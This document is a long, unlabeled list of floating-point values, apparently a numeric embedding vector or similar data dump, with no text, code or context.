0.007889842614531517, -0.042059384286403656, 0.00811230018734932, 0.005798737518489361, -0.02068859152495861, -0.03597886860370636, -0.01480086985975504, -0.03571191802620888, -0.017633501440286636, -0.010922686196863651, -0.021845372393727303, -0.0037224632687866688, 0.000565877475310117, 0.012902561575174332, 0.02003604732453823, -0.00869069155305624, -0.025879276916384697, 0.003110703779384494, 0.006777552887797356, -0.015527565963566303, 0.012294510379433632, -0.016654687002301216, -0.01687714457511902, 0.01107099186629057, 0.002595342928543687, 0.01822672225534916, -0.03402123972773552, 0.0008323635556735098, -0.010752134956419468, 0.007315159309655428, -0.011693873442709446, -0.038144126534461975, -0.0232542734593153, -0.02068859152495861, 0.0011391701409593225, 0.005728292744606733, 0.023832663893699646, -0.0021578422747552395, 0.015972482040524483, -0.01566104032099247, 0.01994706504046917, -0.0135625209659338, 0.006918442901223898, -0.0017240492161363363, 0.0003911552485078573, -0.0001631358463782817, 0.010455524548888206, -0.007011133711785078, -0.061161108314991, -0.012880316004157066, 0.0008930760668590665, 0.009417387656867504, -0.009091115556657314, 0.0692882388830185, -0.013555105775594711, 0.015913160517811775, 0.01044069416821003, 0.03517802059650421, 0.016135618090629578, -0.05605940893292427, 0.0010307219345122576, 0.004879244603216648, 0.005509542301297188, -0.0015090064844116569, -0.0000174809083546279, -0.011827348731458187, 0.0029012225568294525, 0.012739426456391811, -0.008861241862177849, -0.005153609439730644, 0.014771209098398685, 0.02819283865392208, -0.0048977830447256565, -0.05407211557030678, 0.022987322881817818, -0.015030743554234505, 0.001985437236726284, -0.035029713064432144, -0.023461900651454926, 0.02371401898562908, -0.00799365621060133, 0.00885382667183876, -0.02036231942474842, -0.0010520408395677805, -0.021459778770804405, -0.033161066472530365, -0.02581995539367199, -0.015156802721321583, -0.030817843973636627, 0.02218647487461567, -0.027050888165831566, -0.01354027446359396, -0.003859645687043667, -0.002196772489696741, -0.002280194079503417, 0.039211925119161606, -0.003099580993875861, -0.01626909337937832, 0.015972482040524483, -0.0036965098697692156, -0.010092176496982574, 0.01616527885198593, -0.017841128632426262, -0.024529699236154556, 0.0022078952752053738, -0.02497461438179016, -0.011945992708206177, 0.04078396037220955, 0.015334769152104855, 0.024766987189650536, 0.005865475162863731, 0.013799808919429779, -0.0032831088174134493, -0.013340062461793423, -0.005961873568594456, -0.027510635554790497, 0.012027560733258724, -0.004211870953440666, 0.011582644656300545, -0.0436314232647419, 0.009024377912282944, 0.02484113909304142, 0.004831045400351286, -0.008253190666437149, 0.014296632260084152, 0.015090065076947212, 0.0022004800848662853, -0.03238987922668457, 0.01330298651009798, -0.0017954211216419935, 0.008371834643185139, 0.003459221450611949, -0.017440704628825188, -0.05353821814060211, -0.025656819343566895, -0.002189357066527009, -0.011360187083482742, 0.004697570577263832, 0.020421640947461128, 0.03924158588051796, 0.0038670608773827553, -0.020614437758922577, -0.018983079120516777, 0.007129777688533068, 0.003314623609185219, -0.008965056389570236, -0.032182253897190094, -0.022868677973747253, -0.04297887906432152, 0.00605827197432518, 0.026576312258839607, 0.005224054679274559, 0.008327343501150608, 0.04683481529355049, 0.003316477406769991, -0.0032831088174134493, -0.021519100293517113, 0.0028567309491336346, -0.003527812659740448, 0.00981039647012949, -0.007485710550099611, 0.022156814113259315, 0.00728179095312953, 0.02573097124695778, -0.006469819229096174, -0.014318877831101418, 0.009105945937335491, 0.010915271006524563, 0.008965056389570236, -0.025923768058419228, 0.00780827458947897, -0.06145771965384483, -0.013399384915828705, 0.01549790520220995, 0.030313605442643166, 0.010804042220115662, -0.03591954708099365, 0.018256383016705513, -0.016951296478509903, 0.010915271006524563, 0.023417407646775246, 0.001741660526022315, -0.01873096078634262, 0.010425863787531853, -0.00352410483174026, 0.0038299846928566694, 0.029675893485546112, -0.005554033908993006, 0.014882437884807587, 0.008082639425992966, -0.022023338824510574, -0.015764854848384857, 0.015927990898489952, 0.00293644517660141, -0.027614448219537735, -0.024855969473719597, -0.003918967675417662, -0.002402546117082238, -0.020154692232608795, -0.01644705981016159, -0.004816215019673109, -0.006810921244323254, -0.035682257264852524, -0.008052978664636612, -0.005179563071578741, 0.009387725964188576, -0.005798737518489361, -0.019680114462971687, 0.008186453022062778, -0.01748519577085972, 0.023046644404530525, 0.0011697581503540277, -0.010677982121706009, -0.004675325006246567, 0.006006365176290274, -0.029290297999978065, 0.007355943322181702, 0.0026694955304265022, -0.040339045226573944, 0.007252129726111889, 0.01374790258705616, -0.00736335851252079, -0.016283923760056496, 0.0009992070263251662, -0.025656819343566895, -0.011842179112136364, 0.002895661164075136, 0.029349621385335922, -0.023506391793489456, -0.012146204710006714, 0.0363348014652729, 0.06709332019090652, 0.004197040107101202, 0.015394091606140137, 0.012331586331129074, -0.01144175510853529, -0.01242056954652071, -0.015364429913461208, 0.025464022532105446, 0.008497894741594791, 0.006054564379155636, 0.009795566089451313, -0.00717797689139843, -0.01770765334367752, 0.012450231239199638, 0.020673761144280434, 0.008023316971957684, 0.0047494773752987385, -0.021266981959342957, 0.02297249250113964, -0.015201294794678688, 0.025849616155028343, 0.020243674516677856, 0.01305086724460125, -0.004375006537884474, 0.0021152044646441936, -0.012086883187294006, 0.001673069316893816, 0.009172683581709862, 0.00017113042122218758, 0.007711876183748245, -0.028771230950951576, 0.005127656273543835, -0.006621832028031349, -0.005105410236865282, 0.010322049260139465, 0.008015901781618595, 0.029023349285125732, -0.012086883187294006, 0.012835824862122536, -0.019368672743439674, 0.012220357544720173, -0.014444936998188496, 0.001970606856048107, -0.025434359908103943, -0.020169522613286972, -0.026947075501084328, 0.026531819254159927, -0.0026120273396372795, -0.002645395928993821, -0.007074163295328617, 0.013799808919429779, -0.02503393590450287, 0.017974603921175003, 0.009565692394971848, -0.004341638181358576, 0.02334325574338436, 0.005394605454057455, 0.005809860769659281, 0.017218247056007385, -0.020451301708817482, 0.011552983894944191, 0.001491395290941, 0.03313140571117401, 0.010203405283391476, 0.003518543438985944, 0.005198101047426462, -0.030120808631181717, 0.014415276236832142, -0.0031459263991564512, -0.0141705721616745, 0.006165793165564537, 0.0046716174110770226, 0.01757417991757393, -0.004360176157206297, -0.0061287167482078075, 0.02218647487461567, -0.019235199317336082, 0.018567824736237526, -0.0244703758507967, 0.011315695010125637, 0.03191530331969261, 0.02399579994380474, -0.006799798458814621, -0.02484113909304142, -0.006829459685832262, 0.0293644517660141, -0.010129252448678017, 0.01199789997190237, 0.003904137294739485, -0.00001330982195213437, 0.0021393040660768747, 0.003347992431372404, 0.012835824862122536, 0.006996302865445614, 0.006725645624101162, -0.011152558960020542, 0.018093246966600418, -0.0027288177516311407, 0.000031659707019571215, -0.01807841658592224, 0.013644088990986347, 0.00226536369882524, 0.011708703823387623, -0.01696612685918808, 0.009157853201031685, 0.030966149643063545, -0.009602769277989864, 0.03150004893541336, 0.009966117329895496, -0.0014070466859266162, 0.012435399927198887, -0.0015646209940314293, 0.002730671549215913, -0.0428602360188961, -0.03523734211921692, -0.013807224109768867, 0.0177521463483572, 0.00347775942645967, 0.01849367283284664, -0.02203816920518875, -0.019694944843649864, -0.0004159500531386584, 0.004412082955241203, -0.005027549806982279, -0.0030662124045193195, 0.009454463608562946, -0.0063993739895522594, -0.015631379559636116, 0.01156039908528328, 0.012175866402685642, 0.012939638458192348, -0.004627125803381205, 0.014689641073346138, 0.009002132341265678, 0.03835175186395645, -0.006618124432861805, 0.0020688590593636036, 0.014556165784597397, 0.0005723658250644803, -0.006751599255949259, 0.0010288681369274855, 0.02101486176252365, -0.01859748549759388, 0.013851716183125973, 0.011041330173611641, -0.010529677383601665, -0.00003464319524937309, 0.0010047685354948044, 0.021355964243412018, 0.007593231741338968, -0.0025137749034911394, 0.023002153262495995, 0.017722483724355698, 0.03538564592599869, 0.00307548139244318, -0.005083164665848017, 0.01868646964430809, -0.01004768442362547, -0.01681782305240631, 0.010848533362150192, -0.002912345575168729, 0.0026694955304265022, 0.0018584509380161762, -0.007867597043514252, 0.010381371714174747, 0.019190706312656403, -0.01738138310611248, 0.0025415823329240084, -0.034881409257650375, -0.028741568326950073, -0.005357529502362013, 0.030461911112070084, -0.014845361933112144, 0.0077341217547655106, 0.011775441467761993, -0.005064626224339008, -0.00392638286575675, -0.04093226417899132, 0.01118222065269947, 0.008861241862177849, -0.023476731032133102, 0.0030903120059520006, -0.011612305417656898, -0.030639877542853355, 0.03701700642704964, -0.020050877705216408, 0.010640906170010567, 0.008698106743395329, -0.018004264682531357, 0.010826287791132927, 0.012776502408087254, 0.016239430755376816, -0.02092587947845459, -0.015468243509531021, -0.00040529060061089694, 0.01136760227382183, -0.003863353282213211, 0.00047365008504129946, 0.015334769152104855, -0.0063993739895522594, 0.006829459685832262, -0.0017500026151537895, 0.010433278977870941, 0.007704460993409157, 0.01790045015513897, 0.015127141959965229, 0.010967177338898182, -0.015230955556035042, 0.007830520160496235, 0.007411557715386152, -0.02203816920518875, 0.0030346973799169064, 0.012850655242800713, 0.036839038133621216, 0.006195454392582178, 0.013688580133020878, 0.005224054679274559, -0.002964252373203635, 0.016669517382979393, 0.0050683338195085526, -0.016091126948595047, 0.0295869093388319, -0.0007484783418476582, -0.009706582874059677, -0.030788183212280273, 0.02264622040092945, 0.03873734548687935, 0.0022245796862989664, -0.02973521500825882, 0.027881398797035217, -0.020391980186104774, -0.003042112570255995, -0.0004312440287321806, -0.00036497009568847716, -0.015720363706350327, -0.020154692232608795, 0.00792691856622696, -0.002256094478070736, 0.024663172662258148, -0.03648310527205467, 0.03144072741270065, 0.02418859675526619, -0.02110384590923786, 0.0030013287905603647, 0.001878842944279313, -0.00029290298698469996, 0.00587289035320282, 0.01626909337937832, -0.02358054369688034, 0.02647249773144722, -0.008327343501150608, 0.021044524386525154, 0.007274375297129154, 0.014630318619310856, 0.0006896196864545345, 0.038885653018951416, 0.020154692232608795, -0.034139882773160934, -0.004134010523557663, -0.02101486176252365, 0.015030743554234505, 0.01062607578933239, 0.0021318888757377863, -0.006577340420335531, -0.014711886644363403, 0.005861767567694187, -0.026813600212335587, 0.010173744522035122, -0.01840468868613243, 0.003922675270587206, -0.010729889385402203, -0.014014852233231068, -0.020391980186104774, 0.009269081987440586, -0.0008193868561647832, -0.021415287628769875, 0.006670031230896711, 0.0008953933138400316, 0.0027436481323093176, 0.010655736550688744, 0.01864197663962841, 0.0008685129578225315, 0.018671639263629913, -0.02749580517411232, -0.02083689533174038, 0.0295869093388319, -0.03298310190439224, -0.002734379144385457, -0.025241563096642494, -0.021771220490336418, 0.003800323698669672, -0.00880933552980423, -0.01752968691289425, -0.010344295762479305, -0.004441744182258844, 0.006351174786686897, -0.02273520454764366, 0.026413176208734512, -0.0024118151050060987, -0.002391423098742962, 0.008067809045314789, 0.012887731194496155, -0.002780724549666047, -0.000587196322157979, -0.003347992431372404, 0.016298754140734673, -0.033665306866168976, -0.0026491035241633654, 0.024959784001111984, -0.006632954813539982, 0.02814834751188755, -0.027436481788754463, -0.026828430593013763, -0.007367066107690334, -0.012190696783363819, -0.007118654903024435, -0.008861241862177849, 0.004775431007146835, 0.01715892367064953, -0.010804042220115662, -0.006028610747307539, -0.0024896753020584583, 0.00565043231472373, -0.03375428915023804, -0.011167390272021294, 0.006896196864545345, 0.011945992708206177, 0.003598257666453719, -0.0026694955304265022, -0.009409971535205841, 0.0007526494446210563, 0.028252162039279938, 0.02614622563123703, 0.02814834751188755, 0.00717797689139843, 0.006714522838592529, -0.002333954907953739, 0.009906794875860214, -0.006673738826066256, -0.00003577286406653002, -0.030461911112070084, 0.021830542013049126, -0.03123309835791588, 0.007233591750264168, 0.014274385757744312, -0.006555094849318266, 0.0028771229553967714, 0.01687714457511902, -0.0071557313203811646, -0.007689630147069693, -0.0025211903266608715, -0.0042341165244579315, -0.0023803003132343292, -0.015735194087028503, 0.005969288758933544, 0.01816740073263645, 0.01529027707874775, -0.0035574736539274454, -0.014177987352013588, -0.03084750473499298, 0.0007938968483358622, -0.00736335851252079, 0.03206360712647438, -0.011923747137188911, -0.002035490470007062, 0.007196515332907438, -0.002328393282368779, 0.00257495092228055, -0.03500005230307579, 0.01230192556977272, -0.0024210840929299593, -0.006996302865445614, -0.0027844321448355913, -0.005131363868713379, 0.034466154873371124, 0.023135628551244736, 0.03304242342710495, 0.00015108603111002594, -0.013851716183125973, 0.021697066724300385, -0.0032460324000567198, -0.008987301960587502, 0.0060211955569684505, -0.0161207877099514, -0.02427757903933525, 0.00041502315434627235, -0.005398313514888287, 0.016372906044125557, 0.009128191508352757, 0.04007209464907646, 0.017841128632426262, -0.005357529502362013, -0.0028993687592446804, 0.024826308712363243, -0.007956580258905888, 0.010329464450478554, 0.02292800135910511, -0.006403081584721804, -0.029112331569194794, 0.0038967221044003963, 0.01798943430185318, 0.02636868506669998, -0.006050856783986092, 0.003481467254459858, 0.00483475299552083, 0.019220368936657906, 0.01006993092596531, -0.021370794624090195, 0.02623520977795124, 0.01468222588300705, 0.033398356288671494, 0.02423308789730072, 0.030699199065566063, 0.022987322881817818, 0.0012680103536695242, 0.006996302865445614, -0.021474609151482582, -0.01511972676962614, -0.020451301708817482, 0.00925425160676241, 0.00677013723179698, 0.022987322881817818, -0.013584766536951065, -0.02954241819679737, 0.03363564610481262, 0.004730939399451017, 0.0028289237525314093, -0.03393225371837616, 0.00041247415356338024, 0.031618691980838776, -0.01400743704289198, 0.011760611087083817, -0.002799262758344412, 0.003996828105300665, -0.0027844321448355913, -0.0031088499817997217, 0.001064090640284121, 0.013147265650331974, -0.015149387530982494, 0.016194939613342285, 0.0031366574112325907, -0.0028326313477009535, 0.00446398975327611, -0.00829768180847168, 0.004638248588889837, -0.0032182252034544945, 0.004682740196585655, 0.01916104555130005, 0.009054039604961872, 0.0016563849058002234, 0.010707643814384937, -0.003030989784747362, 0.00257495092228055, 0.008030732162296772, -0.013154680840671062, 0.017322059720754623, 0.03084750473499298, -0.003210810013115406, 0.0037298784591257572, 0.004011658485978842, 0.01663985662162304, -0.02003604732453823, 0.018938587978482246, -0.005001596640795469, 0.002469283528625965, 0.024707665666937828, -0.0006525433855131269, -0.007682214956730604, -0.00922458991408348, -0.0007429168908856809, 0.034881409257650375, -0.01248730719089508, -0.00023485536803491414, -0.013340062461793423, -0.002491529332473874, -0.0070630405098199844, -0.004582634195685387, -0.0016081857029348612, -0.002461868105456233, 0.0063215140253305435, 0.01025531254708767, 0.014919513836503029, -0.0001727525086607784, -0.005728292744606733, 0.013532859273254871, 0.01873096078634262, -0.008349589072167873, 0.014259555377066135, 0.002304293680936098, 0.00843115709722042, -0.00966950599104166, 0.010752134956419468, -0.015453413128852844, 0.010907855816185474, 0.00686282804235816, -0.0021114968694746494, -0.007463464979082346, 0.014533920213580132, -0.0035630350466817617, 0.0010353564284741879, 0.0020911048632115126, 0.018093246966600418, -0.014081588946282864, -0.01655087247490883, 0.012472476810216904, -0.008327343501150608, 0.001990998862311244, -0.027792414650321007, -0.005138779059052467, -0.008327343501150608, 0.01794494315981865, -0.016002142801880836, 0.022764865309000015, 0.016417397186160088, 0.004208163358271122, -0.01123412698507309, 0.005965581163764, -0.0027436481323093176, -0.022809356451034546, -0.008312513120472431, 0.004471404943615198, 0.00527966907247901, -0.0011716119479387999, -0.007986241020262241, -0.009840057231485844, -0.01859748549759388, -0.015512735582888126, 0.02129664272069931, 0.001218884252011776, -0.01925002969801426, 0.017114432528614998, 0.005316745489835739, -0.002354346914216876, -0.03962717950344086, 0.008423741906881332, -0.005806152708828449, 0.007889842614531517, 0.010107006877660751, 0.003755832090973854, -0.018137739971280098, 0.0064735268242657185, 0.012346416711807251, -0.0021374502684921026, -0.02009536884725094, -0.015675870701670647, 0.000564023619517684, 0.0031830028165131807, -0.007148316130042076, -0.002235702471807599, 0.00225980207324028, -0.0014172425726428628, -0.03006148710846901, -0.002510067308321595, -0.002895661164075136, -0.004497358575463295, 0.003685387084260583, -0.025553004816174507, 0.0039152600802481174, -0.0023432238958775997, 0.004994181450456381, -0.0076080625876784325, -0.005769076757133007, 0.009105945937335491, -0.0037836392875760794, -0.015260616317391396, -0.023639867082238197, -0.0009009547648020089, 0.011641967110335827, -0.020302997902035713, 0.020021216943860054, -0.003527812659740448, -0.009773319587111473, -0.03029877506196499, -0.007971410639584064, 0.001331040170043707, -0.011456585489213467, -0.026353852823376656, 0.002845608163625002, 0.024692833423614502, 0.008223529905080795, 0.020851727575063705, -0.004486235789954662, 0.008950225077569485, -0.009046623483300209, 0.005394605454057455, -0.02194918505847454, -0.0006590317352674901, 0.010381371714174747, -0.004163671750575304, 0.005858059972524643, 0.0018649392295628786, 0.009313573129475117, -0.004819922614842653, -0.00012698641512542963, -0.020673761144280434, -0.02782207541167736, -0.0077341217547655106, 0.006154670380055904, -0.01004768442362547, 0.02921614609658718, -0.023862324655056, 0.017692822962999344, -0.007711876183748245, -0.020940709859132767, -0.019383504986763, 0.005246300250291824, 0.021074185147881508, 0.004775431007146835, -0.022245796397328377, -0.0023209780920296907, -0.010618660598993301, -0.0059915343299508095, 0.004953397437930107, -0.003247886197641492, 0.008104884997010231, -0.01299896091222763, 0.035622935742139816, 0.013569936156272888, -0.012398323975503445, -0.017500026151537895, 0.015156802721321583, -0.005932212341576815, 0.01855299435555935, 0.020065708085894585, -0.006607001647353172, 0.0037651010788977146, 0.018523333594202995, -0.01319175772368908, 0.013332647271454334, -0.0025248979218304157, 0.008401495404541492, 0.0005932212225161493, 0.010225650854408741, 0.00023589812917634845, -0.007315159309655428, 0.02242376282811165, 0.02931996062397957, 0.011011669412255287, -0.03126275911927223, -0.005654139909893274, -0.0027640401385724545, -0.010322049260139465, 0.008230945095419884, 0.003474051831290126, 0.005168440286070108, 0.014734132215380669, -0.0075339097529649734, 0.008282851427793503, 0.022453423589468002, -0.008601708337664604, 0.0008527555619366467, 0.003918967675417662, 0.000011412556887080427, 0.01006251573562622, 0.01085594855248928, 0.003544496838003397, 0.013525444082915783, -0.01423730980604887, 0.015379260294139385, 0.03144072741270065, 0.006799798458814621, -0.015067819505929947, 0.015927990898489952, 0.0035352278500795364, 0.013013791292905807, 0.006807213649153709, -0.02493012323975563, -0.0036520182620733976, 0.011775441467761993, 0.030269114300608635, 0.014823115430772305, 0.012820994481444359, -0.0019520686473697424, 0.018256383016705513, -0.0009537885198369622, 0.012984129600226879, -0.011871839873492718, -0.011122898198664188, 0.009143022820353508, 0.015601718798279762, -0.006102763582020998, -0.0004604416317306459, 0.0033090622164309025, 0.008764843456447124, 0.010373956523835659, -0.011033914983272552, -0.006121301557868719, 0.007756367791444063, 0.004300854168832302, 0.002867853967472911, 0.011464000679552555, -0.0001662641589064151, -0.00022825114137958735, -0.011760611087083817, 0.001626723911613226, -0.019961895421147346, 0.004189624916762114, 0.009424802847206593, 0.007211345713585615, 0.006888781674206257, 0.010500015690922737, -0.001583159202709794, -0.016417397186160088, 0.020347489044070244, 0.004934858996421099, 0.0032219327986240387, -0.004860706627368927, 0.01156039908528328, -0.021148337051272392, 0.014059343375265598, 0.011983068659901619, -0.0064920648001134396, 0.018834775313735008, -0.0074263885617256165, 0.021919524297118187, 0.006925858091562986, -0.02264622040092945, -0.0030699199996888638, 0.00542797427624464, 0.004471404943615198, -0.006028610747307539, -0.010507430881261826, -0.013629257678985596, -0.022957662120461464, -0.003768808674067259, -0.00007704924064455554, -0.005127656273543835, -0.010225650854408741, 0.006258483976125717, 0.018004264682531357, 0.011226711794734001, 0.01761867105960846, 0.02079240418970585, 0.0040190741419792175, -0.000025098936021095142, 0.004033904522657394, 0.012398323975503445, -0.04558905214071274, 0.0007697972469031811, -0.0026991567574441433, 0.01855299435555935, 0.017084771767258644, 0.014600657857954502, -0.004274900536984205, 0.004994181450456381, 0.013021206483244896, 0.0011484392452985048, -0.008846411481499672, -0.012947053648531437, 0.0044602821581065655, 0.0010075492318719625, 0.005461343098431826, 0.014689641073346138, 0.006436450406908989, -0.01554239634424448, 0.01933901198208332, 0.0017092187190428376, 0.009150438010692596, 0.0029012225568294525, 0.0039152600802481174, 0.005516957491636276, 0.004693862982094288, -0.022245796397328377, -0.004682740196585655, 0.014400445856153965, 0.0027862859424203634, 0.014066758565604687, -0.014266970567405224, -0.014741548337042332, -0.008030732162296772, 0.006714522838592529, 0.016788160428404808, 0.02442588470876217, -0.010885610245168209, 0.023417407646775246, 0.01529027707874775, 0.019887741655111313, -0.007860181853175163, 0.009157853201031685, -0.004204455763101578, 0.018375027924776077, -0.022023338824510574, 0.0026732031255960464, 0.018612315878272057, -0.0012281533563509583, 0.00212076585739851, 0.018582655116915703, 0.006929565686732531, 0.02455935999751091, -0.023565713316202164, -0.010084761306643486, -0.01060382928699255, -0.010759550146758556, -0.01179027184844017, -0.001558132702484727, 0.0016072588041424751, 0.004137718118727207, 0.011056160554289818, -0.013214003294706345, 0.0017296107253059745, -0.0024785525165498257, 0.007726706564426422, 0.002422938123345375, -0.0036297724582254887, 0.018375027924776077, 0.01542375236749649, -0.013125020079314709, 0.0058209835551679134, -0.001623943098820746, -0.012079467996954918, -0.007077870890498161, -0.0012559605529531837, -0.030313605442643166, -0.011819933541119099, 0.01970977522432804, 0.0022672174964100122, -0.013006376102566719, 0.027391990646719933, -0.0067627220414578915, -0.018464012071490288, 0.016580533236265182, -0.0024284995160996914, -0.01104874536395073, -0.00007623819692526013, 0.002144865458831191, -0.006911027245223522, 0.001965045463293791, -0.01785595901310444, 0.005783907137811184, 0.00929874274879694, -0.010574168525636196, 0.0009584230720065534, -0.0008198503055609763, -0.00736335851252079, -0.006154670380055904, 0.001940945745445788, -0.017084771767258644, -0.015149387530982494, 0.014734132215380669, 0.019175875931978226, -0.015060404315590858, -0.005316745489835739, 0.014815700240433216, 0.00811230018734932, -0.0018575240392237902, -0.009713998064398766, 0.008579461835324764, -0.018345367163419724, -0.008186453022062778, -0.0043527609668672085, 0.012761672027409077, -0.002243117894977331, 0.0005561449215747416, 0.020065708085894585, 0.006569925229996443, 0.01575002446770668, 0.0026991567574441433, -0.0003068066143896431, 0.008638784289360046, 0.006844290066510439, 0.031203437596559525, 0.00987713411450386, 0.02046613208949566, 0.005064626224339008, -0.0026027581188827753, -0.0010353564284741879, 0.008712937124073505, 0.005342698656022549, -0.03500005230307579, 0.0027862859424203634, 0.00813454668968916, -0.0033980454318225384, -0.009172683581709862, 0.01975426822900772, -0.0032367634121328592, -0.006488357204943895, -0.010010608471930027, -0.013718240894377232, -0.025508513674139977, -0.0063103907741606236, -0.001154000754468143, 0.010158914141356945, -0.00811230018734932, 0.00843115709722042, -0.009595353156328201, -0.007304036524146795, -0.01018115971237421, 0.006340052001178265, 0.022779695689678192, 0.00403019692748785, -0.024307239800691605, 0.01892375759780407, 0.005617063492536545, 0.012324171140789986, 0.0020911048632115126, 0.022201305255293846, 0.0011938577517867088, -0.006425327621400356, 0.008920564316213131, 0.004367591347545385, 0.0011577083496376872, 0.00203363667242229, -0.0057764919474720955, -0.00462341820821166, 0.014689641073346138, 0.0019335304386913776, 0.00992904044687748, -0.017544519156217575, 0.0063103907741606236, 0.015957651659846306, 0.009328404441475868, -0.0033183314371854067, 0.0007813835982233286, -0.009565692394971848, 0.02801487408578396, -0.004957105033099651, 0.0017314645228907466, -0.002189357066527009, -0.013391969725489616, -0.003110703779384494, 0.00811230018734932, 0.007593231741338968, 0.010574168525636196, 0.009869717992842197, -0.0038559380918741226, -0.016995789483189583, 0.012324171140789986, -0.0025452899280935526, 0.001331040170043707, -0.010136667639017105, -0.003863353282213211, 0.015156802721321583, 0.005238885059952736, 0.01916104555130005, -0.008386665023863316, 0.0009593499707989395, -0.009788150899112225, -0.0023302470799535513, -0.01323624886572361, 0.02888987399637699, -0.009765904396772385, -0.003299793228507042, 0.0066774464212358, -0.02908267080783844, -0.012843240052461624, 0.009595353156328201, 0.0008027025032788515, -0.0002258180029457435, 0.014482013881206512, -0.012665273621678352, -0.013458707369863987, -0.017811467871069908, -0.0002375202311668545, 0.000010521855983824935, -0.03253818675875664, -0.002237556269392371, -0.004137718118727207, -0.014882437884807587, 0.02214198373258114, -0.0005125802126713097, 0.011337940581142902, -0.02246825397014618, 0.02372884936630726, -0.0016128201968967915, -0.000540850916877389, -0.011308279819786549, 0.006273314822465181, 0.0003262716927565634, -0.006039733998477459, -0.018864436075091362, -0.0030346973799169064, 0.0017574179219081998, -0.011990484781563282, -0.017173754051327705, 0.00379290827549994, 0.021222490817308426, 0.003996828105300665, -0.0028993687592446804, 0.011805103160440922, 0.0023172704968601465, 0.007066748104989529, -0.022052999585866928, -0.030402589589357376, -0.014593242667615414, -0.0015331062022596598, -0.006540264002978802, -0.021875033155083656, -0.020214013755321503, 0.004174794536083937, 0.0055503263138234615, 0.0006854485836811364, -0.0039745825342834, 0.026724616065621376, 0.015164217911660671, 0.023328425362706184, -0.006425327621400356, 0.019887741655111313, 0.0023858617059886456, 0.026442836970090866, -0.023002153262495995, 0.00008405898552155122, -0.0010798480361700058, -0.01962079294025898, -0.0027621863409876823, 0.019279690459370613, 0.0036279186606407166, 0.0020855434704571962, 0.0005014573107473552, -0.016328414902091026, -0.002237556269392371, 0.008557216264307499, -0.0014051927719265223, -0.010433278977870941, -0.01511972676962614, 0.006773845292627811, 0.007237299345433712, -0.01948731765151024, 0.03090682625770569, 0.014000020921230316, -0.0034684904385358095, -0.0506017729640007, 0.01594282127916813, 0.0025693895295262337, -0.022245796397328377, -0.018612315878272057, -0.023091137409210205, 0.0005167513154447079, -0.010158914141356945, -0.00045279465848580003, 0.0038670608773827553, 0.027762753888964653, -0.017781807109713554, 0.02708054892718792, 0.017500026151537895, -0.005109117832034826, -0.005479881074279547, 0.010774380527436733, 0.013555105775594711, 0.028697077184915543, -0.002823362359777093, 0.00850530993193388, 0.02404029108583927, 0.0037762238644063473, -0.005390897858887911, -0.0040190741419792175, -0.0038225692696869373, -0.015186463482677937, -0.00037864199839532375, -0.006258483976125717, 0.011100652627646923, 0.004115472547709942, 0.01583900675177574, -0.026576312258839607, 0.005287084262818098, -0.000518141663633287, -0.004586341790854931, -0.014244724996387959, 0.0032460324000567198, -0.00033948011696338654, -0.0012911830563098192, -0.015913160517811775, -0.012220357544720173, -0.005346406251192093, 0.005446512717753649, -0.013154680840671062, 0.008067809045314789, -0.029675893485546112, 0.0071260700933635235, -0.02236444130539894, 0.005487296264618635, -0.0023636159021407366, 0.005528080277144909, -0.022586898878216743, 0.0026250039227306843, 0.006032318342477083, 0.0026472497265785933, -0.019591132178902626, -0.00792691856622696, 0.011308279819786549, -0.006340052001178265, -0.003588988445699215, -0.007133485283702612, 0.028875043615698814, -0.011308279819786549, 0.029290297999978065, 0.006981472484767437, -0.003724317066371441, -0.010151498951017857, -0.01400743704289198, 0.023610206320881844, -0.012227772735059261, 0.004456574562937021, -0.007433803752064705, 0.0013718240661546588, -0.017692822962999344, -0.012398323975503445, -0.009498954750597477, -0.003077335190027952, 0.010737304575741291, -0.020154692232608795, 0.011159975081682205, -0.014860192313790321, 0.020851727575063705, 0.018019095063209534, -0.0019224075367674232, 0.020569946616888046, -0.002013244666159153, -0.006658908445388079, 0.011968238279223442, -0.010500015690922737, 0.00008040928514674306, 0.018627146258950233, -0.00018538163567427546, -0.015438582748174667, -0.02279452607035637, -0.016625026240944862, 0.005572571884840727, 0.010737304575741291, -0.012339001521468163, -0.020614437758922577, 0.015468243509531021, -0.03654242679476738, 0.026413176208734512, -0.003728024661540985, -0.005461343098431826, -0.015186463482677937, -0.022631390020251274, -0.004571511410176754, 0.02455935999751091, -0.019457656890153885, 0.01566104032099247, -0.015957651659846306, -0.00414884090423584, 0.010025438852608204, -0.01910172402858734, -0.00924683641642332, -0.016283923760056496, -0.014089004136621952, -0.02316528931260109, -0.007229883689433336, -0.00027876763488166034, -0.01975426822900772, 0.03449581563472748, -0.029557248577475548, -0.0023840079084038734, -0.02460385113954544, 0.027317838743329048, -0.011805103160440922, 0.01668434776365757, 0.04372040554881096, -0.029112331569194794, -0.008579461835324764, 0.00950637087225914, -0.012502137571573257, -0.0005394605686888099, -0.010099591687321663, -0.002282047877088189, -0.0050497958436608315, 0.002302439883351326, 0.004011658485978842, -0.01701061986386776, 0.004137718118727207, 0.015149387530982494, -0.0036001114640384912, -0.020777573809027672, -0.01816740073263645, 0.005275961477309465, 0.006662616040557623, 0.006262191571295261, -0.000011948425708396826, 0.008349589072167873, 0.006454988848417997, -0.0033109160140156746, 0.03354666009545326, -0.013925869017839432, 0.023803003132343292, 0.010403617285192013, -0.0027176947332918644, 0.0177521463483572, -0.00011099725816166028, 0.002369177294895053, -0.006213992368429899, 0.0021819418761879206, 0.00817903783172369, -0.008846411481499672, 0.004074688535183668, 0.0012383493594825268, -0.002191210864111781, -0.004111764952540398, -0.0004159500531386584, -0.021756388247013092, 0.011093237437307835, -0.006069394759833813, 0.005624478682875633, -0.007682214956730604, -0.017633501440286636, -0.007956580258905888, 0.00131064816378057, 0.01511972676962614, -0.009536031633615494, 0.005387190263718367, 0.002573097124695778, 0.016610193997621536, -0.006295560393482447, -0.004882952198386192, 0.008468233048915863, -0.001015891321003437, 0.014385615475475788, 0.02092587947845459, -0.0019261152483522892, -0.0003816544485744089, 0.008779674768447876, -0.014126081019639969, 0.010922686196863651, -0.0011039476376026869, 0.0050683338195085526, 0.011174805462360382, -0.0143782002851367, 0.010878194123506546, 0.006013780366629362, -0.0216229148209095, 0.004360176157206297, 0.0008856607601046562, 0.00043796413228847086, 0.006614416837692261, 0.007304036524146795, -0.051699232310056686, 0.0228390172123909, 0.006050856783986092, 0.009454463608562946, -0.018419519066810608, 0.012820994481444359, 0.004022781737148762, 0.0006733987829647958, 0.02040681056678295, -0.013362308032810688, 0.008512725122272968, 0.007941748946905136, 0.005583695136010647, 0.010952346958220005, -0.01770765334367752, -0.01905723288655281, 0.0052314698696136475, 